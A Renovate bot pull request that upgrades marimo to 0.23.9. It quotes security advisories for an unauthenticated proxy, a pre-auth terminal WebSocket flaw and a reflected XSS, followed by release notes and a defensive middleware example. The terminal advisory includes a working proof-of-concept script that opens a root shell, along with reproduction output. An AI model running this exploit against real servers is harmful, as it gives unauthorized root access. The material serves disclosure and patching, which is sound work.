chore(deps): update dependency marimo to v0.23.9 [security] #155

Open
renovate[bot] wants to merge 1 commit into main from renovate/pypi-marimo-vulnerability

@renovate renovate Bot commented Apr 8, 2026

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package | Change
marimo | >0.14,<0.15 → >0.14,<0.24
marimo | ==0.14.17 → ==0.23.9

marimo vulnerable to proxy abuse of /mpl/{port}/

GHSA-xjv7-6w92-42r7

Details

Summary

The /mpl/<port>/<route> endpoint, which is accessible without authentication on default Marimo installations, allows external attackers to reach internal services and arbitrary ports.

Details

From our understanding, this route is used internally to provide access to interactive matplotlib visualizations.
marimo/marimo/_server/main.py at main · marimo-team/marimo
This endpoint functions as an unauthenticated proxy, allowing an attacker to connect to any service running on the local machine via the specified <port> and <route>.

The existence of this proxy is visible in the application's code (marimo/_server/main.py), but there's no official documentation or warning about its behavior or potential risks.

Impact

CWE-441: Proxying Without Authentication

This vulnerability can be used to bypass firewalls and access internal services that are intended to be local-only. The level of impact depends entirely on what services are running and accessible on the local machine.

Full Local Access: An attacker can use this proxy to connect to local services that answer to web sockets, HTTP or ASGI protocol, effectively gaining a foothold on the machine. Depending on the service, this can lead to remote code execution, data exfiltration, or further network penetration.

Exposure of Sensitive Services: Our scans of public-facing Marimo servers have shown that many are exposing sensitive internal services, including:

Old CUPS Servers: Could allow an attacker to view print jobs or configuration or, depending on old vulnerabilities, allow RCE.

phpMyAdmin: Provides a web interface to a MySQL database, potentially exposing sensitive data.

RPCMapper: Can be used for network reconnaissance and enumerating services.

While you’d hope people wouldn’t expose marimo instances to the internet, we found numerous public Marimo instances using tools like Shodan. Many of these servers, some even hosted on cloud platforms like AWS GovCloud, were found to be vulnerable. This means the vulnerability isn't limited to a few isolated cases but is a widespread issue affecting production environments.

===

Note: this was discovered by devgi. I (acepace) followed up and also created this report.

Severity

  • CVSS Score: 6.9 / 10 (Medium)
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


Marimo: Pre-Auth Remote Code Execution via Terminal WebSocket Authentication Bypass

CVE-2026-39987 / GHSA-2679-6mx9-h9xc

Details

Summary

Marimo (19.6k stars) has a Pre-Auth RCE vulnerability. The terminal WebSocket endpoint /terminal/ws lacks authentication validation, allowing an unauthenticated attacker to obtain a full PTY shell and execute arbitrary system commands.

Unlike other WebSocket endpoints (e.g., /ws) that correctly call validate_auth() for authentication, the /terminal/ws endpoint only checks the running mode and platform support before accepting connections, completely skipping authentication verification.

Affected Versions

Marimo <= 0.20.4

Vulnerability Details
Root Cause: Terminal WebSocket Missing Authentication

marimo/_server/api/endpoints/terminal.py lines 340-356:

@router.websocket("/ws")
async def websocket_endpoint(websocket: WebSocket) -> None:
    app_state = AppState(websocket)
    if app_state.mode != SessionMode.EDIT:
        await websocket.close(...)
        return
    if not supports_terminal():
        await websocket.close(...)
        return
    # No authentication check!
    await websocket.accept()  # Accepts connection directly
    # ...
    child_pid, fd = pty.fork()  # Creates PTY shell

Compare with the correctly implemented /ws endpoint (ws_endpoint.py lines 67-82):

@router.websocket("/ws")
async def websocket_endpoint(websocket: WebSocket) -> None:
    app_state = AppState(websocket)
    validator = WebSocketConnectionValidator(websocket, app_state)
    if not await validator.validate_auth():  # Correct auth check
        return

Authentication Middleware Limitation

Marimo uses Starlette's AuthenticationMiddleware, which marks failed auth connections as UnauthenticatedUser but does NOT actively reject WebSocket connections. Actual auth enforcement relies on endpoint-level @requires() decorators or validate_auth() calls.

The /terminal/ws endpoint has neither a @requires("edit") decorator nor a validate_auth() call, so unauthenticated WebSocket connections are accepted even when the auth middleware is active.

Attack Chain
  1. WebSocket connect to ws://TARGET:2718/terminal/ws (no auth needed)
  2. websocket.accept() accepts the connection directly
  3. pty.fork() creates a PTY child process
  4. Full interactive shell with arbitrary command execution
  5. Commands run as root in default Docker deployments

A single WebSocket connection yields a complete interactive shell.

Proof of Concept

import websocket
import time

# Connect without any authentication
ws = websocket.WebSocket()
ws.connect('ws://TARGET:2718/terminal/ws')
time.sleep(2)

# Drain initial output
try:
    while True:
        ws.settimeout(1)
        ws.recv()
except:
    pass

# Execute arbitrary command
ws.settimeout(10)
ws.send('id\n')
time.sleep(2)
print(ws.recv())  # uid=0(root) gid=0(root) groups=0(root)
ws.close()

Reproduction Environment

FROM python:3.12-slim
RUN pip install --no-cache-dir marimo==0.20.4
RUN mkdir -p /app/notebooks
RUN echo 'import marimo as mo; app = mo.App()' > /app/notebooks/test.py
WORKDIR /app/notebooks
EXPOSE 2718
CMD ["marimo", "edit", "--host", "0.0.0.0", "--port", "2718", "."]

Reproduction Result

With auth enabled (server generates random access_token), the exploit bypasses authentication entirely:

$ python3 exp.py http://127.0.0.1:2718 exec "id && whoami && hostname"
[+] No auth needed! Terminal WebSocket connected
[+] Output:
uid=0(root) gid=0(root) groups=0(root)
root
ddfc452129c3

Suggested Remediation
  1. Add authentication validation to /terminal/ws endpoint, consistent with /ws using WebSocketConnectionValidator.validate_auth()
  2. Apply unified authentication decorators or middleware interception to all WebSocket endpoints
  3. Terminal functionality should only be available when explicitly enabled, not on by default

Impact

An unauthenticated attacker can obtain a full interactive root shell on the server via a single WebSocket connection. No user interaction or authentication token is required, even when authentication is enabled on the marimo instance.

Severity

  • CVSS Score: 9.3 / 10 (Critical)
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


marimo contains a reflected cross-site scripting vulnerability in the notebook page

CVE-2026-54386 / GHSA-8m59-7xv8-735h

Details

marimo before 0.23.9 contains a reflected cross-site scripting vulnerability in the notebook page that allows unauthenticated attackers to inject arbitrary JavaScript by exploiting improper escaping of single quotes in the file query parameter reflected into an inline JavaScript string literal. Attackers can craft a malicious link with a payload beginning with new to bypass the 404 check and inject JavaScript into the page, which executes without Content-Security-Policy restrictions in the origin of a victim's marimo server.

Severity

  • CVSS Score: 5.1 / 10 (Medium)
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


Release Notes

marimo-team/marimo (marimo)

v0.23.9

What's Changed

This release makes opening a notebook in a second tab non-destructive, mo.ui.table adds new args for hidden_columns/visible_columns (mutually exclusive), and tightens sharing and error-output behavior across the board.

⭐️ Highlights
Open the same notebook in a second tab

Opening a notebook in a second browser tab no longer forcibly disconnects the first. The new tab joins as a live, read-only viewer, and you can take over editing from either side with a single click — no destructive modal and no reload required (#​9746).

Show and hide table columns

mo.ui.table now supports column visibility. Hide and show columns from the column header menu, Column Explorer with a click, find columns fast with smart prefix-based search, and control initial visibility from Python. A hidden-count and "Unhide all" link keep things discoverable (#​9687, #​9696).

Cells with no output now show in slides

Because slides allow code edits, a slide edited to no longer produce an output used to disappear from the deck entirely. Such cells now appear in the slides minimap and viewer so you can edit them back in (they're still skipped during a presentation). Minimap thumbnails are also larger and more readable (#​9771).

✨ Enhancements
  • Add MARIMO_RESTRICT_SHARING env var machine-wide (#​9756)
  • Non-destructive local takeover (read-only viewer + bidirectional takeover) (#​9746)
  • Add cells with no output to the minimap & viewer (#​9771)
  • Add GET /api/kernel/status endpoint (#​9768)
  • Enforce sharing config as server-side security (#​9578)
  • Add filter param for regex and callable filtering (#​9667)
  • Slides config panel open by default (#​9737)
  • Add pair with agent link (#​9738)
  • Add Opus 4.8 and script to append models to the top (#​9723)
  • Remove mapping for 'src' to 'auto-mix-prep' (#​9725)
  • Add workflow to automate running llm-sync-models script (#​9724)
  • Automation script to pull models.yml (#​9635)
  • Support Dremio ADBC data source browsing (#​9694)
  • Add auto_close_pairs setting (#​9711)
  • WASM compatibility rule checks (#​9587)
  • Fix dropped error hints and improve error output UI (#​9673)
  • Column Explorer visibility controls + smart-search (#​9696)
  • Sort toml entries when writing config (#​9686)
  • Pretty format hidden variable behavior in stack traces (#​9660)
  • Add column visibility kwargs and UI controls (#​9687)
  • Unified filter pill UI with overflow strip (#​9638)
  • Add padding between cell number and minimap dependency lines (#​9675)
🐛 Bug fixes
  • Escape user-controlled file_key in service worker injection (#​9789)
  • Fix completions in slides view (#​9769)
  • Arg/kwarg collision for local numpy vars in caching (#​9751)
  • Suppress marimo hover tooltip for all LSP providers, not just pylsp (#​9741)
  • Fix SQL defs lookup (#​9754)
  • Keep stepped range progress totals aligned (#​9582)
  • Per-provider max_tokens defaults with optional override (#​9703)
  • Accept ChartDataType in mo.ui.table to resolve pyright error when passing chart.value (#​9674)
  • Jump to running notebook cells only (#​9707)
  • Fix mo.cache raising KeyError: 'scratch' in scratchpad (#​9664)
  • Fix interruption for pydantic-ai chatbot (#​9620)
  • Preserve top level names for name thrashing (#​9695)
  • Lazy download-size RPC + first-page extrapolation (#​9691)
📚 Documentation
  • Add config to disable AI (#​9739)
  • Update molab docs with new compute and sharing features (#​9748)
📝 Other changes
  • Don't shadow builtin print unless mo.Thread is used (#​9765, #​9766)
  • Zz/zt/zb scroll for notebook viewport (#​9701, #​9728)
  • Add rule to prevent test files from having the same name (#​9671)
Contributors

Thanks to all our community and contributors who made this release possible: @​akshayka, @​corleyma, @​dmadisetti, @​everettroeth, @​foxcroftjn, @​GHX5T-SOL, @​kirangadhave, @​kjgoodrick, @​kratos0718, @​Light2Dark, @​mscolnick, @​nojaf, @​Rowlando13, @​VishakBaddur, @​XanthanGum

And especially to our new contributors:

Full Changelog: marimo-team/marimo@0.23.8...0.23.9

v0.23.8

v0.23.7

What's Changed

This release brings major upgrades to table filtering, adds speaker notes to slide view, and lets WASM notebooks query remote files with DuckDB.

⭐ Highlights
Powerful new table column filters

Table columns now support the full operator set across every dtype. Text columns get contains, starts_with, ends_with, equals, regex, is_empty, and more, with a slash-bracketed regex input and a creatable values picker for in / not_in. Number columns get native between, and the new date/datetime/time filter UI brings the same operator coverage to date-like columns with smart clipboard paste for ISO/US/RFC dates and A - B ranges (#​9597, #​9615).

Speaker notes for slides

Press S in slide view to open speaker notes alongside the current slide, including in fullscreen and kiosk mode (#​9533).

Query remote files with DuckDB in WASM notebooks

WASM notebooks can now read CSV, Parquet, JSON, and GeoJSON over HTTP from mo.sql, SQL cells, raw duckdb.sql/query/execute, connection SQL methods, and the duckdb.read_csv/read_parquet/read_json Python API. marimo rewrites the AST with sqlglot, fetches the remote file via its shared WASM fetch util, and binds the result as a pandas DataFrame that DuckDB can scan (#​9480).

SELECT * FROM read_csv('https://example.com/cars.csv')
✨ Enhancements
  • Expand column filter operators and pill-editor UX (#​9597)
  • Date/datetime/time filter UI (#​9615)
  • Add speaker notes for slides (#​9533)
  • Support HTTP DuckDB queries in WASM notebooks (#​9480)
  • Snapshot document and outputs in MCP execute_code (#​9654)
  • Rename ctx.notify to broadcast_raw_notification (#​9581)
  • Record staleness reads on .code access only (#​9655)
  • Expose cell outputs to code_mode (#​9653)
  • Make marimo new CLI help page render properly at 80 columns (#​9636)
  • Read-before-write protection for cell edits (#​9585)
  • Skip stdlib/site-packages on per-cell check (#​9629)
  • Show cell index in dependency minimap (#​9633)
  • Extract ModuleReloader/ModuleWatcher into AutoreloadManager (#​9590)
  • DRY up code between wasm and native kernel (#​9591)
  • Update default duckdb mo.sql deps (#​9599)
  • Show .git and .venv in file browser (#​9606)
  • Support disabled on dropdown and multiselect (#​9600)
  • Split kernel command dispatch into router + callback bundles (#​9577)
  • Add Prompt tab to pair-with-agent modal (#​9568)
  • Replace MarimoFileKey alias with FileKey ADT (#​9483)
  • Optimize memoize_last_value for faster UI reactivity (#​9555)
  • Hardening pass — utilities, deprecated API cleanup, lifespan fix (#​9552)
  • Stream uploads to disk instead of buffering (#​9527)
  • Add kernel_session() as context manager, DRY up tests (#​9554)
  • Sandboxed exports for consistent wasm envs (#​9519)
  • Add tool approval flow for chat-panel (#​9507)
  • Remove input for hidden cells from exports (#​9548)
  • Parallelize file uploads with bounded concurrency (#​9528)
  • Use multipart/form-data for /api/files/create (#​9521)
  • Show loading and success toasts for exports (#​9509)
  • Add cut cells command (#​8019)
  • Allow def declarations within functions (#​9379)
  • Correlate scratchpad completion with run_id (#​9350)
  • Make disconnect indicator clickable to reconnect (#​9410)
🐛 Bug fixes
  • Guard SQL ref extraction on sqlglot availability (#​9656)
  • Fix lru_cache(...) resetting when cell is rerun (#​9609)
  • Skip reload when notebook has git conflict markers (#​9626)
  • Stream lazy-polars output via pl(lazy=True) (#​9648)
  • Trigger downloads programmatically to work inside cross-origin iframes (#​9649)
  • Stdin handling for empty submissions (#​9556)
  • Avoid pyarrow requirement for polars output in DuckDB engine (#​9643)
  • Isolate test_project_dependencies from pyproject.toml pollution (#​9634)
  • Restore selection_mode='all' and accept list form (#​9630)
  • Allow freezing pandas index columns (#​9631)
  • Inline public/ images in static HTML export (#​9627)
  • Remove unused flush_messages plumbing (#​9598)
  • Migrate remaining background-task sites to asyncio_utils (#​9596)
  • Normalize dev version in static notebook asset URL (#​9592)
  • JSON-escape > and < in web-component attrs (#​9595)
  • Render Enum members as str in JSON serializer (#​9594)
  • Narrow callback deps, drop get_context in cache (#​9589)
  • Callback bug fixes in cache clear, dataset connections, and model updates (#​9588)
  • Avoid treating class-like array refs as data primitives (#​9569)
  • Group kernel streams into KernelStreams; phase-key NotebookCellHooks (#​9571)
  • Pass theme to register_formatters in pyodide and script runner (#​9553)
  • Use Referrer-Policy same-origin to fix Chrome 147+ Error code 5 on macOS (#​9543)
  • Extract shared kernel lifecycle for subprocess and pyodide (#​9541)
  • Hide watermark when printing (#​9525)
  • Markdown singleton to mitigate reported race condition (#​9530)
  • Contain comm callback errors in mpl_interactive (#​9532)
  • Disconnect toolbar callbacks on cell rerun (#​9531)
  • Fix overflow and support vertical tabs (#​9511)
  • Allow hosts to size-gate downloads (#​9510)
  • Detect marimo notebooks with long module docstrings (#​9652)
  • Fix argument splitting on '--' in the command line (#​9368)
📚 Documentation
  • Update markdown_indentation.md (#​9622)
  • Standardize supported dataframe backends across UI elements (#​9583)
  • Attribution (#​9608)
  • Polish tutorial notebooks (#​9573)
  • Add detailed docstring for CLI recover command (#​9546)
  • Note that an added notebook will be downloaded if it's a URL path (#​9545)
  • Clarify that marimo run hides source code by default (#​9529)
  • Add Mermaid theme customization options (#​9478)
  • Remove formatter recommendation section from guide (#​9434)
📝 Other changes
  • Enforce single backticks in Python docstrings (markdown, not RST) (#​9645)
  • Add data-testid to top-level chrome elements (#​9566)
  • Fix pnpm-workspace.yaml configuration (#​9574)
  • Fix pnpm-workspace.yaml configuration (#​9515)
Contributors

Thanks to all our community and contributors who made this release possible: @​akshayka, @​archpulse, @​arghaffari, @​dmadisetti, @​jeremytanjianle, @​JoostGevaert, @​kirangadhave, @​leoadberg, @​Light2Dark, @​manzt, @​mchav, @​mscolnick, @​peter-gy, @​Rowlando13, @​Shamik-07, @​williambdean

And especially to our new contributors:

Full Changelog: marimo-team/marimo@0.23.6...0.23.7

v0.23.6

What's Changed
🚨 Breaking changes
  • Propagate notebook filename through MarimoIslandGenerator.from_file (#​9409). This is a correctness fix, but could break existing users who relied on broken assumptions.
✨ Enhancements
  • Implement kernel exit classification and notification system (#​9500)
  • Render notebook snapshot while Pyodide initializes (#​9502)
  • hide add cell toolbar when show-chrome is false (#​9487)
  • Add gpt-5.5 support (#​9488)
  • Extract NotebookWorkspace from AppFileRouter (#​9448)
  • Add new W&B models to llm-info data (#​9465)
  • Add --execute to marimo export html-wasm for session previews (#​9437)
🐛 Bug fixes
  • Send initial size when WebSocket opens (#​9505)
  • Restore --proxy for base_url (#​9503)
  • Avoid exponential blow-up of nested struct sample values (#​9506)
  • Normalize Windows backslashes in inserted image URLs (#​9504)
  • Skip wasm controller dynamic import unless host opts in (#​9467)
  • fix label alignment (#​9486)
  • standardize (y/n) prompt defaults (#​9492)
  • Skip /health checks for static notebooks (#​9498)
  • Avoid RecursionError when formatting objects with getattr traps (#​9497)
  • Prevent mpl figure DPI from compounding on cell rerun (#​9474)
  • use unified thinking for pydantic-ai (#​9477)
  • Remount on src change in mo.Html to avoid stale paint (#​9472)
  • Fix UI hang and stabilize tests for unusual tuple/list/dict child classes (#​9468)
  • Include cell_manager in TransactionSource literal (#​9457)
  • Improve parameter validation error messages for list[NewType] fields (#​9442)
📚 Documentation
  • OpenCode Go config (#​9431)
  • Add slides documentation and video (#​9464)
  • Additional security acknowledgements (#​9450)
📝 Other changes
Contributors

Thanks to all our community and contributors who made this release possible: @​app/renovate, @​dmadisetti, @​domwst, @​fonnesbeck, @​kirangadhave, @​Light2Dark, @​ljchang, @​mchav, @​mscolnick, @​ralphptorres, @​stephenlf, @​wally-an

New Contributors

Full Changelog: marimo-team/marimo@0.23.5...0.23.6

v0.23.5

What's Changed

This release adds editable code in slide view, OpenTelemetry distributed tracing support, and patches polars network I/O in WASM notebooks.

⭐ Highlights
Editable code in slide view

Press C (or click the code icon) in slide view to toggle an inline code editor under each slide, including in fullscreen mode. Run mode shows a read-only editor when include-code is enabled.

✨ Enhancements
  • Add OTLP export and W3C trace context propagation to tracing (#​9414)
  • Add editable code in slide view (#​9389)
  • Patch polars I/O in wasm (#​9413)
  • Add a CLI tip for marimo pair (#​9422)
  • Prompt user to build fe at first run (#​9381)
🐛 Bug fixes
  • Provide upper bound on jedi pin (#​9449)
  • Force Content-Disposition on table export downloads (#​9426)
📚 Documentation
  • Update marimo-pair docs to mention molab (#​9436)
📝 Other changes
  • Add load_notebook helper, simplify AppFileRouter (#​9438)
  • Add data-testids to file-explorer dropdown menu items (#​9427)
  • Deflake subprocess kill test (#​9423)
  • CI: doppler secrets (#​9236)
Contributors

Thanks to all our community and contributors who made this release possible: @​akshayka, @​dmadisetti, @​koaning, @​Light2Dark, @​mscolnick, @​ouatu-ro, @​tigretigre

Full Changelog: marimo-team/marimo@0.23.4...0.23.5

v0.23.4

What's Changed
✨ Enhancements
  • Update snapshots and types for altair v6.1.0 / vega-lite v6.4.1 (#​9415)
  • make _format_plan respect format_on_save; format enabled/disabled unit tests (#​9380)
  • standardize top k filter components and logic (#​9393)
  • Editable filter pills (#​9349)
🐛 Bug fixes
  • allow cell selection on non-interactive marimo elements (#​9399)
  • adjust ordering of header (#​9403)
  • Msgspec encoding for starlette user (#​9406)
  • Check platform instead of sys.modules for pyodide check (#​9404)
  • Docs typo (#​9400)
  • Scope filter-by-values top-K to exclude the filter being edited (#​9376)
  • Hide marimo-pair in wasm, fix opencode prompt (#​9375)
  • Mark DuckDb INET type (from inet extension) as unknown type (#​9384)
  • Add Path to cookie (#​9364)
📚 Documentation
  • Documentation Bugfix: Polars cannot read json from URL (#​9397)
📝 Other changes
  • Update dependency postcss to ^8.5.10 (#​9334)
  • Update dependency postcss to v8.5.10 [security] (#​9372)
Contributors

Thanks to all our community and contributors who made this release possible: @​akshayka, @​app/renovate, @​daniel-bogdoll, @​dmadisetti, @​iggylari, @​jpopesculian, @​kirangadhave, @​Light2Dark, @​mscolnick, @​ouatu-ro

New Contributors

Full Changelog: marimo-team/marimo@0.23.3...0.23.4

v0.23.3

What's Changed
✨ Enhancements
  • Add slide config form in sidebar, and reveal slide types (#​9300)
  • Restore LICENSE in sdist via PEP 639 license-files (#​9341)
  • Status indicator for PDF exports via CLI (#​9322)
  • workspace management: add hooks, and shared components (#​9272)
🐛 Bug fixes
  • Guard _resolve_proxy against bare-port inputs (#​9366)
  • Guard _references_virtual_file against cyclic data (#​9369)
  • Decode tuple/frozenset payloads with non-finite floats (#​9365)
  • Return html encoded matplotlib Figure from msgspec encoder hook (#​9359)
  • Harden trust-bearing window globals and gate script loading (#​9330)
  • fix markdown .center, .right, .left not respecting new lines (#​9326)
  • File navigator (#​9307)
  • Add _MARIMO_DISABLE_AUTH_ON_VIRTUAL_FILES env flag (#​9343)
  • Correct AWS Bedrock Claude model IDs (#​9299)
  • Kill kernel's process group on shutdown (#​9257)
  • Add DataFusionFormatter (#​9338)
  • Preserve shared-memory virtual files owned by other live sessions (#​9228)
  • Update CsvViewer layout to use flex column. (#​9336)
  • Emit relative Location on login redirect (#​9314)
  • bump pymdown-extensions to fix NoneType bug (#​9319)
  • Trust exported notebook pages (#​9318)
  • Preserve non-string dict keys in rich display (#​9301)
  • Update dataflow.md.txt snapshot (#​9315)
  • Fix type-check Channel.Pull with NewType and union msg_type (#​9296)
📚 Documentation
  • Specify html is only in app mode (#​9333)
  • Fix typo in documentation for dataflow.py (#​9173)
📝 Other changes
Contributors

Thanks to all our community and contributors who made this release possible: @​akshayka, @​app/renovate, @​bfriebel, @​dmadisetti, @​Light2Dark, @​manzt, @​mchav, @​mscolnick, @​NewDestinyDan, @​peter-gy, @​shaun0927

New Contributors

Full Changelog: marimo-team/marimo@0.23.2...0.23.3

v0.23.2

What's Changed
🚨 Breaking changes
  • Mo.ui.refresh typing and docs (#​9229)
✨ Enhancements
  • Code-mode .screenshot() api (#​9232)
  • Visible markers for leading/trailing whitespace in string cells (#​9256)
  • swap reveal.js instead of swiper for slides (#​9166)
  • change wasm link to molab link on run page (#​9240)
  • Bail out of type inference when completion budget expires (#​9247)
  • Introduce better_inspect module for enhanced dir() and help() functionality for marimo-pair (#​9223)
  • add molab resource to edit homepage (#​9241)
  • Add ctx.packages namespace to code mode (#​9233)
  • Backend-based file and directory duplication (#​9142)
  • Support columns in marimo-pair (#​9212)
  • Expand uv_build supported versions in build-system (#​9231)
  • Visually distinguish null, empty, whitespace, NaN, and Infinity in table cells (#​9218)
  • Restore Altair SVG output as base64-encoded Data URLs (#​9104)
  • Auto-save in code-mode and marimo-pair (#​9191)
  • add molab share action (#​9207)
  • LSP root and document URI integration from backend (#​9143)
  • Decouple Matplotlib render resolution (DPI) from display size (#​9144)
🐛 Bug fixes
  • Hold references to asyncio tasks (#​9261)
  • Use urlparse instead of regex for proxy determination (#​9254)
  • Preserve columns in DefaultTableManager exports (#​9258)
  • Drop dangling @​file URLs from the session cache (#​9278)
  • Make FieldTypes a Map to preserve column order (#​9279)
  • Avoid double-mangling names inside walrus comprehension (#​9276)
  • Static path handling (#​9281)
  • Restore plain text tracebacks and fix exit codes for cod

Note

PR body was truncated to here.


Configuration

📅 Schedule: (UTC)

  • Branch creation
    • At any time (no schedule defined)
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about these updates again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.
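
An added example, not code from marimo, the advisory, or this repository: the second remediation in the CVE-2026-39987 advisory quoted in this PR body (intercept every WebSocket endpoint centrally, so a route that forgets its own check is still refused) written as dependency-free ASGI middleware. The class name, the token lookup (an `access_token` query parameter or a Bearer header), the stand-in endpoint and the token value are assumptions for illustration.

```python
"""Added example: a central auth gate for every WebSocket route (pure ASGI)."""
import asyncio
import hmac
from urllib.parse import parse_qs


class WebSocketAuthGate:
    """ASGI middleware that refuses unauthenticated WebSocket handshakes.

    Hypothetical helper: where the token is read from (access_token query
    parameter or Authorization: Bearer header) is an assumption, not marimo's
    own logic.
    """

    def __init__(self, app, token):
        self.app = app
        self.token = token.encode("utf-8")

    def is_authorized(self, scope):
        candidates = []
        query = parse_qs(scope.get("query_string", b"").decode("latin-1"))
        candidates += [v.encode("utf-8") for v in query.get("access_token", [])]
        for name, value in scope.get("headers", []):
            if name.lower() == b"authorization" and value.startswith(b"Bearer "):
                candidates.append(value[len(b"Bearer "):])
        # Constant-time comparison of every presented credential.
        return any([hmac.compare_digest(c, self.token) for c in candidates])

    async def __call__(self, scope, receive, send):
        # HTTP and lifespan scopes pass through; they are authenticated elsewhere.
        if scope["type"] != "websocket" or self.is_authorized(scope):
            await self.app(scope, receive, send)
            return
        # Closing before accept makes the ASGI server answer the handshake
        # with HTTP 403, so the endpoint code never runs.
        await receive()  # consume websocket.connect
        await send({"type": "websocket.close", "code": 1008})


async def unguarded_terminal(scope, receive, send):
    """Stand-in for an endpoint that accepts without an auth check.

    It mirrors the flaw described in the advisory but spawns nothing.
    """
    await receive()
    await send({"type": "websocket.accept"})
    await send({"type": "websocket.close", "code": 1000})


async def _handshake(app, path, query_string, headers):
    scope = {
        "type": "websocket",
        "path": path,
        "query_string": query_string,
        "headers": list(headers),
    }
    sent = []

    async def receive():
        return {"type": "websocket.connect"}

    async def send(message):
        sent.append(message)

    await app(scope, receive, send)
    return sent[0]["type"] if sent else None


def handshake(app, path, query_string=b"", headers=()):
    """Drive one constructed handshake; return the app's first reply type."""
    return asyncio.run(_handshake(app, path, query_string, headers))


if __name__ == "__main__":
    token = "constructed-token"  # constructed sample value
    guarded = WebSocketAuthGate(unguarded_terminal, token)
    print("unguarded, no token :", handshake(unguarded_terminal, "/terminal/ws"))
    print("guarded, no token   :", handshake(guarded, "/terminal/ws"))
    print("guarded, valid token:",
          handshake(guarded, "/terminal/ws", b"access_token=constructed-token"))
```

Wrapping the whole application in the gate, rather than decorating routes one by one, is what removes the dependence on each endpoint remembering its own check.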

@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from 1c65b54 to 7beba5b on April 15, 2026 14:02
@renovate renovate Bot changed the title from "chore(deps): update dependency marimo to v0.23.0 [security]" to "chore(deps): update dependency marimo [security]" on Apr 15, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from 7beba5b to b6a8cd0 on April 16, 2026 16:51
@renovate renovate Bot changed the title from "chore(deps): update dependency marimo [security]" to "chore(deps): update dependency marimo to v0.23.0 [security]" on Apr 16, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from b6a8cd0 to 92a9dc4 on April 19, 2026 12:42
@renovate renovate Bot changed the title from "chore(deps): update dependency marimo to v0.23.0 [security]" to "chore(deps): update dependency marimo [security]" on Apr 19, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from 92a9dc4 to 89157b8 on April 19, 2026 21:51
@renovate renovate Bot changed the title from "chore(deps): update dependency marimo [security]" to "chore(deps): update dependency marimo to v0.23.0 [security]" on Apr 19, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from 89157b8 to 1b75e66 on April 21, 2026 20:09
@renovate renovate Bot changed the title from "chore(deps): update dependency marimo to v0.23.0 [security]" to "chore(deps): update dependency marimo [security]" on Apr 21, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from 1b75e66 to a6e4045 on April 21, 2026 23:32
@renovate renovate Bot changed the title from "chore(deps): update dependency marimo [security]" to "chore(deps): update dependency marimo to v0.23.0 [security]" on Apr 21, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from a6e4045 to dc3b16f on April 23, 2026 14:36
@renovate renovate Bot changed the title from "chore(deps): update dependency marimo to v0.23.0 [security]" to "chore(deps): update dependency marimo [security]" on Apr 23, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from dc3b16f to 2ee2688 on April 23, 2026 19:51
@renovate renovate Bot changed the title from "chore(deps): update dependency marimo [security]" to "chore(deps): update dependency marimo to v0.23.0 [security]" on Apr 23, 2026
@renovate renovate Bot changed the title from "chore(deps): update dependency marimo to v0.23.0 [security]" to "chore(deps): update dependency marimo to v0.23.0 [security] - autoclosed" on Apr 27, 2026
@renovate renovate Bot closed this on Apr 27, 2026
@renovate renovate Bot deleted the renovate/pypi-marimo-vulnerability branch on April 27, 2026 18:58
@renovate renovate Bot changed the title from "chore(deps): update dependency marimo to v0.23.0 [security] - autoclosed" to "chore(deps): update dependency marimo to v0.23.0 [security]" on Apr 27, 2026
@renovate renovate Bot reopened this on Apr 27, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch 3 times, most recently from 1f90162 to b1db5a5 on April 29, 2026 14:40
@renovate renovate Bot changed the title from "chore(deps): update dependency marimo to v0.23.0 [security]" to "chore(deps): update dependency marimo [security]" on Apr 29, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from b1db5a5 to bd3e8da on April 29, 2026 22:08
@renovate renovate Bot changed the title from "chore(deps): update dependency marimo [security]" to "chore(deps): update dependency marimo to v0.23.0 [security]" on Apr 29, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from bd3e8da to 35c4452 on April 30, 2026 17:00
@renovate renovate Bot changed the title from "chore(deps): update dependency marimo to v0.23.0 [security]" to "chore(deps): update dependency marimo [security]" on Apr 30, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from 35c4452 to 36aaa06 on April 30, 2026 22:53
@renovate renovate Bot changed the title from "chore(deps): update dependency marimo to v0.23.0 [security]" to "chore(deps): update dependency marimo [security]" on May 14, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from 61fae99 to a5b60ca on May 14, 2026 21:48
@renovate renovate Bot changed the title from "chore(deps): update dependency marimo [security]" to "chore(deps): update dependency marimo to v0.23.0 [security]" on May 14, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from a5b60ca to 3f2d51b on May 18, 2026 09:39
@renovate renovate Bot changed the title from "chore(deps): update dependency marimo to v0.23.0 [security]" to "chore(deps): update dependency marimo [security]" on May 18, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from 3f2d51b to 9993c4f on May 18, 2026 18:16
@renovate renovate Bot changed the title from "chore(deps): update dependency marimo [security]" to "chore(deps): update dependency marimo to v0.23.0 [security]" on May 18, 2026
